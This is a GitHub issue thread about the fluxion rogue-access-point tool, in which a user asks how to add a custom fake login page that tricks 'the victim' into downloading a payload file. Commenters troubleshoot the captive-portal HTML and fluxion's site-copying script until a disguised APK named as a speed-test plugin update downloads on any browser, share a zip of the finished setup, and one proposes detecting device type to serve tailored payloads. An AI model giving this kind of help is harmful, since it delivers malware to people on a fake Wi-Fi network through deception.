### ISSUE TITLE
How to REPLACE/ADD NEW WEB INTERFACE for LOGIN PAGE?

### ISSUE THREAD

**Issue by hyzo90** [deltaxflux/fluxion#325]
### Which version of fluxion are you using?
Fluxion 0.23

### What distribution of Linux (including the version) are you running it on?
Kali Linux Rolling 2016.2

### What wireless adapter are you using? Exact model and chipset, statements like "internal" and "was working before" are not helpful at all.
Atheros AR9271

### Which is the driver for it?
ath9k

### Does it support injection ( output of aireplay-ng -9)
aireplay-ng -9 wlan0mon
23:31:30 Trying broadcast probe requests...
23:31:31 Injection is working

### General description of your issue along with the steps to reproduce it
**I'm a TOTAL noob and just wondering if I could create a login page and add it or replace one of the LOGIN PAGE with my own login page , could I do that ? or how could I do that**

## **BASICALLY THE IDEA IS I CREATED A LOGIN PAGE WITH PAYLOAD FILE. I WANT THE VICTIM TO OPEN THE PAGE AND DOWNLOAD THE FILE**

**I tried to replace one of the LOGIN PAGE but failed**
![untitled-2](https://cloud.githubusercontent.com/assets/24711785/21418221/0deb9314-c863-11e6-81f1-89b88ecd1a93.jpg)

**FAILED**
![untitled-3](https://cloud.githubusercontent.com/assets/24711785/21418234/21cfd9b2-c863-11e6-9c9f-99d2bc9e81d0.jpg)

**I replaced the NETGEAR-ENG sites page with mine**
![untitled-4](https://cloud.githubusercontent.com/assets/24711785/21418314/a42dd198-c863-11e6-8e9e-35ed4bf53978.jpg)

**Comment by YouGamePlayHD** [comment]
Try just pasting the index.html of your new website into the old one?

**Comment by hyzo90** [comment]
i tried to modify the original webpage login file.  Managed to change it. but the link to my payload file won't work. everytime i click on it, it just open another page of index.html

**Comment by YouGamePlayHD** [comment]
You have to code this with HTML maybe?

**Comment by YouGamePlayHD** [comment]
Just found the lines in the skript saying which files are opened.
#Conten interface web
function NETGEAR {
	mkdir $DUMP_PATH/data &>$flux_output_device
	cp  $WORK_DIR/Sites/NETGEAR-ENG/info2.css $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/info.css $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/background.png $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/house.png $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/house1.png $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/ayuda.htm $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/error.html $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/final.html $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/info.html $DUMP_PATH/data
	cp  $WORK_DIR/Sites/NETGEAR-ENG/index.htm $DUMP_PATH/data

**Comment by YouGamePlayHD** [comment]
You can then delete the lines you don't need or add new ones.

> Path: /root/fluxion/fluxion.sh

**Comment by hyzo90** [comment]
![untitled-1](https://cloud.githubusercontent.com/assets/24711785/21423703/ced85026-c881-11e6-816f-a87f098ec1ec.jpg)

**Comment by hyzo90** [comment]
do you know anyway of adding new custom page into fluxion ? 
i mean like can I just copy folder of my login page into fluxion's sites folder then it just appear on the sites selection ?

**Comment by marsalansiddiqui** [comment]
send me your login pages i'll add for you.

**Comment by hyzo90** [comment]
@marsalansiddiqui oh thank you. gimme a sec

**Comment by hyzo90** [comment]
https://www.sendspace.com/file/9u5x3b

**Comment by hyzo90** [comment]
@YouGamePlayHD  I've done that . i see what you mean. so where do I go from there ? should I just run Fluxion ? it'll show up on the site selection ?

**Comment by YouGamePlayHD** [comment]
I added it for you but I get exactly the same problem like you, no download. I'll try and change the download command

**Comment by hyzo90** [comment]
@YouGamePlayHD  yeah right. so weird. must be my html codes

**Comment by hyzo90** [comment]
@YouGamePlayHD on my kali linux machine, i open up the index.html . click on the link, i can download it, but on the client side. i wont download it. wonder why.

**Comment by YouGamePlayHD** [comment]
Got the page up but no commands would work, I always land back on idex.html without download wtf

**Comment by YouGamePlayHD** [comment]
Firefox can't find the file at /root/wifiphisher/wifiphisher/data/phishing-pages/plugin_update/update/ispeedtest.apk

**Comment by YouGamePlayHD** [comment]
Wait, why /root/wifiphisher?!
The path is /root/fluxion/...

**Comment by hyzo90** [comment]
@YouGamePlayHD meh. IKR . yeh . i know . i changed it to /root/fluxion/ already. tested on Firefox. it's okay but not on Chrome. am sure it's the code in html

**Comment by hyzo90** [comment]
![page](https://cloud.githubusercontent.com/assets/24711785/21425373/1e372f8e-c88c-11e6-8307-61fb4cf55ad2.jpg)

**Comment by YouGamePlayHD** [comment]
I think something is wrong with the download command, too

**Comment by YouGamePlayHD** [comment]
Maybe like this:
`<a href="/root/fluxion/Sites/update_plugin/update/ispeedtest.apk" target="_blank">Download</a>`

**Comment by hyzo90** [comment]
@YouGamePlayHD bloody hell . still not working . sshhh -_- . i tried both code. i even tried to add 

<a href="http://192.168.1.1/root/fluxion/Sites/update_plugin/update/ispeedtest.apk" target="_blank">Download</a>

**Comment by YouGamePlayHD** [comment]
Even with a blank index.html and only this:
`<a href="/root/fluxion/Sites/update_plugin/update/ispeedtest.apk" target="_blank">Download</a>`
it still won't work?!

**Comment by hyzo90** [comment]
@YouGamePlayHD i think it's in the CSS.

**Comment by YouGamePlayHD** [comment]
Where?

**Comment by YouGamePlayHD** [comment]
Maybe try and upload it somewhere?

**Comment by YouGamePlayHD** [comment]
The apk fike

**Comment by hyzo90** [comment]
@YouGamePlayHD will try. thanks a lot.

**Comment by YouGamePlayHD** [comment]
np
But I think this won't work as the Fake AP isn't connected to the Internet..

**Comment by YouGamePlayHD** [comment]
DONE!! Download started (on any browser)!
Path was wrong and in the skript there was no HTML code specified...
It couldn't work because the command was not recognized..
Here's the final solution (your folder and fluxion, everything is setup, also in fluxion):
[Finally DONE.zip](https://github.com/deltaxflux/fluxion/files/670102/Finally.DONE.zip)
Put fluxion into /root/fluxion/ and plugin_update into /root/fluxion/Sites
I hope everything works with you, too.
I'm glad I could help you ;D

**Comment by deltaxflux** [comment]
Here is the new post https://github.com/deltaxflux/fluxion/wiki/Site

**Comment by hyzo90** [comment]
@YouGamePlayHD  Bloody Hell . it working !!! THANK YOU !!! 

@deltaxflux  finally the master is here. thank you !!!

**Comment by whowhere** [comment]
Sorry to reply,

but I'm thinking to adjust the deltafkux script to dynamically load all files inside a folder
And using PHP and Javascript we can determine what type of device is on the page and set a payload for the device
You brought me on a good idea here :)

**Comment by Vigilence** [comment]
I followed the directions pointed out here and on the wiki, however I get a 404 error on the page or any other page that isn't the default English one.  Sometimes it works and other times it doesn't and the 404 error popups.  Anyone ever get this issue before?
